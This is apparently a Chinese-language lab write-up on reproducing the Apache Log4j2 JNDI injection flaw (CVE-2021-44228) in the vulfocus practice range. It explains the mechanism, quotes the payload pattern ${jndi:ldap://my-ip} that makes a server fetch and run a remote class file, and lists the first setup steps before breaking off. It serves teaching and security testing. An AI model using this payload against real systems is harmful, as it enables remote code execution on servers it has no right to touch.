Apache log4j远程代码执行漏洞复现
(1) 漏洞原理:
Apache Log4j2 中存在JNDI注入漏洞,当程序将用户输入的数据进行日志记录时,即当log4j打印的日志内容中包含${jndi:ldap://my-ip}时,lookup会将jndi注入可执行语句执行,程序会通过ldap协议访问my-ip这个地址,然后my-ip就会返回一个包含java代码的class文件的地址,然后程序再通过返回的地址下载class文件并执行,从而达成漏洞利用目的。
(2) 漏洞复现环境:
vulfocus靶场+火狐浏览器+Hackbar插件
(3) 漏洞复现过程:
首先在vulfocus进行注册登录,如下图:
然后在平台主页搜索log4j2漏洞,如下图:
启动Log4j2远程命令执行(CVE-2021-44228)靶场环境,如下图: